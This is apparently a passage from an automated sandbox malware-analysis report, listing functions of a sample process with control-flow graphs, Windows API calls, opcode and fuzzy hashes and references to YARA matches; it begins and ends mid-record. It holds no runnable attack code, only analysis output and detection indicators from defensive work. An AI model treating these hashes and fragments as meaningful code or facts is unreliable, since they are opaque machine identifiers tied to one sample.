                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 67dc44934c956eb462f0ce7e2b62eb0adb5f37ab733805a75ff10dcb44a47d96
                                                                                                                        • Instruction ID: 50f05c70662dfd508f5236d8ce43a2115bbe5af62b93b07eac2bd1376c2b06ec
                                                                                                                        • Opcode Fuzzy Hash: 67dc44934c956eb462f0ce7e2b62eb0adb5f37ab733805a75ff10dcb44a47d96
                                                                                                                        • Instruction Fuzzy Hash: 56900272B0950402D20071988514706104587D1301F65C462A04245A9D8B958A5165A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413A43 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 36 413a43-413a57 37 413a70 36->37 38 413a59-413a6e 36->38 39 413a72-413a75 37->39 40 413aeb-413aee 37->40 38->37 41 413ad3-413adc 39->41 42 413a77 39->42 43 413b60-413b77 40->43 44 413af0-413b04 40->44 45 413ade-413adf 41->45 50 413b78-413b79 43->50 46 413b07-413b26 44->46 45->46 48 413ae1-413ae7 45->48 49 413b28-413b31 46->49 48->45 51 413ae9 48->51 57 413b32-413b36 49->57 58 413b4e-413b5e 49->58 53 413b92-413b94 50->53 54 413b7b-413b7d 50->54 51->40 55 413c04-413c16 call 423da3 53->55 56 413b96-413b9e 53->56 54->50 59 413b7f 54->59 67 413c1d-413c2d 55->67 56->49 62 413b9f-413bba 56->62 60 413b38-413b3e 57->60 61 413b8c 57->61 58->43 63 413b81-413b87 59->63 64 413bfc-413bfe 59->64 65 413b44-413b4c 60->65 70 413c03 61->70 71 413b8e 61->71 63->65 69 413b89 63->69 66 413c00-413c02 call 4048a3 64->66 64->67 65->58 66->70 74 413c4d-413c53 67->74 75 413c2f-413c3e PostThreadMessageW 67->75 69->61 70->55 71->53 75->74 77 413c40-413c4a 75->77 77->74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        • Opcode ID: 0f66b951a97d18aba47b189e0c1e2a65124cbfb60d69032233e145e9f4b526c8
                                                                                                                        • Instruction ID: 2574eca6f2d5f56ccc1bd02e4798b5663dd9a0b1584a082032d17b550b407e84
                                                                                                                        • Opcode Fuzzy Hash: 0f66b951a97d18aba47b189e0c1e2a65124cbfb60d69032233e145e9f4b526c8
                                                                                                                        • Instruction Fuzzy Hash: AF51343AA086956BC712DF74DC815D6FFB4FE4275571801CED5809B243F329AA8387C9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413BBD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 78 413bbd-413bd5 79 413bdd-413c00 call 42ac73 call 4173a3 78->79 80 413bd8 call 42a263 78->80 85 413c07-413c2d call 423da3 79->85 86 413c02 call 4048a3 79->86 80->79 90 413c4d-413c53 85->90 91 413c2f-413c3e PostThreadMessageW 85->91 86->85 91->90 92 413c40-413c4a 91->92 92->90
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: b2397366000154510d762502a318a62a9c21350ba9503ad02ffce0888c735c3a
                                                                                                                        • Instruction ID: 12493e81235b736e5c6a19267a7f486ac8b49ca60fae4007684d113f2f4ad5f7
                                                                                                                        • Opcode Fuzzy Hash: b2397366000154510d762502a318a62a9c21350ba9503ad02ffce0888c735c3a
                                                                                                                        • Instruction Fuzzy Hash: CE01C2B2D4025CBAEB10AAA19C82DEF7B7C9F41794F0480A9FE14A7241D5284E068BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413BC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 93 413bc3-413c00 call 42a263 call 42ac73 call 4173a3 100 413c07-413c2d call 423da3 93->100 101 413c02 call 4048a3 93->101 105 413c4d-413c53 100->105 106 413c2f-413c3e PostThreadMessageW 100->106 101->100 106->105 107 413c40-413c4a 106->107 107->105
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 00413C3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: f2cc3259a991fc70154711afcc6c10927f8854c4d7537284e83ea66758590cce
                                                                                                                        • Instruction ID: de9477430fcd604e25c47dac0fa00e36b387a0f04ef6605f5d406ef52660caf1
                                                                                                                        • Opcode Fuzzy Hash: f2cc3259a991fc70154711afcc6c10927f8854c4d7537284e83ea66758590cce
                                                                                                                        • Instruction Fuzzy Hash: F801C8B2D0125CBADB10AAD1DC81DEF7B7C9F41794F048069FD1477241E56C5F068BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00428663 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00419990,?,?,00419990,?,?,?,00419990,?,00002000), ref: 004286A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: 8d818a1cf74cbda191dcc26f4aac2b53faa3d4ad35a85bf4eb1abe4f436ec26b
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: 48E0EDB16452147BD614EE59EC41FDB77ACEFC9714F004419FD08A7241D670B9118AF4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004286B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00412285,?,00412285,?,00000000,00412285,?,00412285,?,?), ref: 004286EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction ID: 9085c877e11e7f18b543827f64cd36498cd9212a1cc9c1685cd7aeba0f25bff9
                                                                                                                        • Opcode Fuzzy Hash: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction Fuzzy Hash: B3E06DB12002187BD620EE59DC41FDB33ACDFC9710F000419FE48A7242D670B9118AF9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00428703 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,?,?,C9A01013,?,?,C9A01013), ref: 00428737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 706166bd19ae4e6e253ab784ccbeb40f0997734dc67e646cfff2cc6400dc12a5
                                                                                                                        • Instruction ID: 545911fe7cf8103afb44a29e5664223591d0b01ab1ea1272c36d31e111720f01
                                                                                                                        • Opcode Fuzzy Hash: 706166bd19ae4e6e253ab784ccbeb40f0997734dc67e646cfff2cc6400dc12a5
                                                                                                                        • Instruction Fuzzy Hash: 39E086753412147BD620EB6ADC01FDBB75CDFCA710F004419FA4867281C67079108BF5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 94c954b3bd4b81afdd5491a136cb903c8cdc64159000c597111886c13a5537a5
                                                                                                                        • Instruction ID: 4af7acfe3bff2854ff1b8c516c5dd3ba327d33dca7586e83a4947184540d3886
                                                                                                                        • Opcode Fuzzy Hash: 94c954b3bd4b81afdd5491a136cb903c8cdc64159000c597111886c13a5537a5
                                                                                                                        • Instruction Fuzzy Hash: F0B09B72D055C5D5DF11E760460871B7950E7D1701F15C0B2D2030692F4738D5D1E175
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00B9096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B92DF0: LdrInitializeThunk.NTDLL ref: 00B92DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B90D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        • Opcode ID: 61905f33bcd6469487cbd0901d92e358214de5c13b4c424b0a470735595fd779
                                                                                                                        • Instruction ID: ed72e8974c889ca1c41c1083f4bae18e4e6cefe41db30bc4bf35a81695e46fd4
                                                                                                                        • Opcode Fuzzy Hash: 61905f33bcd6469487cbd0901d92e358214de5c13b4c424b0a470735595fd779
                                                                                                                        • Instruction Fuzzy Hash: 39424971900715DFEB61CF68C885BAAB7F5FF04310F1485E9E989AB241E770AA84CF60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B94340 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b2ccb1d91a25dfae9b16a0d3e7ee3184dabfd6f18458838364510bd0d944846a
                                                                                                                        • Instruction ID: 013c9b66579762b8fc4ec46b4e99affc9032c39ba06bc876a5c84e6bf23af7bc
                                                                                                                        • Opcode Fuzzy Hash: b2ccb1d91a25dfae9b16a0d3e7ee3184dabfd6f18458838364510bd0d944846a
                                                                                                                        • Instruction Fuzzy Hash: FF900272B0980012924071988884546404597E1301B55C062E0424595C8E148A565361
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B94650 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 231e20623d42f62e7c7f28c92e4e6116fefbd90288dd6ef6355d75b028b3f959
                                                                                                                        • Instruction ID: 5cd98ed6ad0bda60f6f1d869e3170d1084fc009ff1722d645c212f886698204f
                                                                                                                        • Opcode Fuzzy Hash: 231e20623d42f62e7c7f28c92e4e6116fefbd90288dd6ef6355d75b028b3f959
                                                                                                                        • Instruction Fuzzy Hash: 8B9002A2B0550042424071988804406604597E2301395C166A05545A1C8A1889559269
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 419aa706dc7224010bd09f265d12c5000d6a0e13d3219d46225a00405fa951e5
                                                                                                                        • Instruction ID: f91189ddc343fadbd9a173e8710a4d75b957766180f6d9919217539952410783
                                                                                                                        • Opcode Fuzzy Hash: 419aa706dc7224010bd09f265d12c5000d6a0e13d3219d46225a00405fa951e5
                                                                                                                        • Instruction Fuzzy Hash: EF9002E2705540924600B298C404B0A454587E1301B55C067E10545A1CC92589519135
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1b1b658ff29f69a3d30ba36890f6581e4699ebc9acc0d0a662f369811c11dfb
                                                                                                                        • Instruction ID: 18c608920051fc12bcf5c0187faaa6a292b9933f1607fc9b50618e2fa54df211
                                                                                                                        • Opcode Fuzzy Hash: f1b1b658ff29f69a3d30ba36890f6581e4699ebc9acc0d0a662f369811c11dfb
                                                                                                                        • Instruction Fuzzy Hash: 9C900266725400020245B598460450B048597D7351395C066F14165D1CCA2189655321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac1e023a95f4dbebcd18860cc1f417ec5b44976f17cb678ecc89215997a7d998
                                                                                                                        • Instruction ID: 106850cdf1605febdce916b616ca6743380367f2e723b8ffd9c8cec3c9cc24a8
                                                                                                                        • Opcode Fuzzy Hash: ac1e023a95f4dbebcd18860cc1f417ec5b44976f17cb678ecc89215997a7d998
                                                                                                                        • Instruction Fuzzy Hash: CD900266715400030205B5984704507008687D6351355C072F1015591CDA2189615121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cde866a0c5b53c1e5692108ad1d60f219ea7e95f138cdfb9f933ae7b24d4f26
                                                                                                                        • Instruction ID: 7f8216f2b8e71bf43499e717ae00d45580fc9aa0ffce9b3ba7c8ad7d7788e4a4
                                                                                                                        • Opcode Fuzzy Hash: 4cde866a0c5b53c1e5692108ad1d60f219ea7e95f138cdfb9f933ae7b24d4f26
                                                                                                                        • Instruction Fuzzy Hash: 46900272B0940802D25071988414746004587D1301F55C062A0024695D8B558B5576A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a328d45c79f4f8f2ea57953351bb306ef9ad1544106fd5191dbaecedba8031ec
                                                                                                                        • Instruction ID: c6a86a759f9fe332a1d92940e694bb7e69a8f6f8c46f8040272be254814ada31
                                                                                                                        • Opcode Fuzzy Hash: a328d45c79f4f8f2ea57953351bb306ef9ad1544106fd5191dbaecedba8031ec
                                                                                                                        • Instruction Fuzzy Hash: A390027270540802D20471988804686004587D1301F55C062A6024696E9A6589917131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 90bc0a4cfa6ad462d31e9f2d1200f00759b03d3e1f03b1260c090e898c65ee16
                                                                                                                        • Instruction ID: 958546dda91ec96c1eae73d2422c7fc42732dc41d129e773552af6a2317ecc21
                                                                                                                        • Opcode Fuzzy Hash: 90bc0a4cfa6ad462d31e9f2d1200f00759b03d3e1f03b1260c090e898c65ee16
                                                                                                                        • Instruction Fuzzy Hash: 0190027270540802D2807198840464A004587D2301F95C066A0025695DCE158B5977A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 22f78ce50b5d979724d778f5f26d63b3b589341fc8ab299508a5b1d6ee202781
                                                                                                                        • Instruction ID: 9fb52d596d54677947035b5f766ef123e28f541c716b6941a0d72963b0b2fcf4
                                                                                                                        • Opcode Fuzzy Hash: 22f78ce50b5d979724d778f5f26d63b3b589341fc8ab299508a5b1d6ee202781
                                                                                                                        • Instruction Fuzzy Hash: AA90027270944842D24071988404A46005587D1305F55C062A00646D5D9A258E55B661
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcfb2978dc2494776c85a92d4479be6577fb6f0e6359af9760fd51f0b723b16b
                                                                                                                        • Instruction ID: 0cb8b4c136662a93366b13d1ba7f65eb31727952e3b82cea990467209016d15e
                                                                                                                        • Opcode Fuzzy Hash: fcfb2978dc2494776c85a92d4479be6577fb6f0e6359af9760fd51f0b723b16b
                                                                                                                        • Instruction Fuzzy Hash: 7C90027270540402D20075D89408646004587E1301F55D062A5024596ECA6589916131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1fe8a6c4ac4e1636a79c657609ddcdc93ccf54cf5e3def33e181ab37dc0e9242
                                                                                                                        • Instruction ID: a386cd75bf6615eca7158702320f3099a2daff08206f1675758ce5f047965993
                                                                                                                        • Opcode Fuzzy Hash: 1fe8a6c4ac4e1636a79c657609ddcdc93ccf54cf5e3def33e181ab37dc0e9242
                                                                                                                        • Instruction Fuzzy Hash: C090027270540403D20071989508707004587D1301F55D462A0424599DDA5689516121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a4718d91fcaf90372132b766560c9f30846275f9f247ed011b9b6a72ceb27ff
                                                                                                                        • Instruction ID: 2189ccbb1829e049d9fdab87467651c4dc5d75efcf3dfaceec486400c73cf053
                                                                                                                        • Opcode Fuzzy Hash: 2a4718d91fcaf90372132b766560c9f30846275f9f247ed011b9b6a72ceb27ff
                                                                                                                        • Instruction Fuzzy Hash: 45900262B0940402D24071989418706005587D1301F55D062A0024595DCA598B5566A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcec9160cb501ea5f50815802e84235ed5fec5a834ca6ba6581d068030af1e52
                                                                                                                        • Instruction ID: e3c4176df7ad8af26c1d5af6e8e56e13c997378d93856b561b6ac3da4a8087fa
                                                                                                                        • Opcode Fuzzy Hash: fcec9160cb501ea5f50815802e84235ed5fec5a834ca6ba6581d068030af1e52
                                                                                                                        • Instruction Fuzzy Hash: 2B90027270540842D20071988404B46004587E1301F55C067A0124695D8A15C9517521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87446ea4e2e7a4515ca8bbef35d5a060363786f37371c0363013e08affd34660
                                                                                                                        • Instruction ID: d4ae313b718a08e4f6a13a00210f572e16c04c8d8c9cf7b8a56779500cf8a441
                                                                                                                        • Opcode Fuzzy Hash: 87446ea4e2e7a4515ca8bbef35d5a060363786f37371c0363013e08affd34660
                                                                                                                        • Instruction Fuzzy Hash: 5190027274540402D24171988404606004997D1341F95C063A0424595E8A558B56AA61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2402f26f8b9356c1529461534b7fdc60bd2b42587e7188ba01dcf7b2e654b82
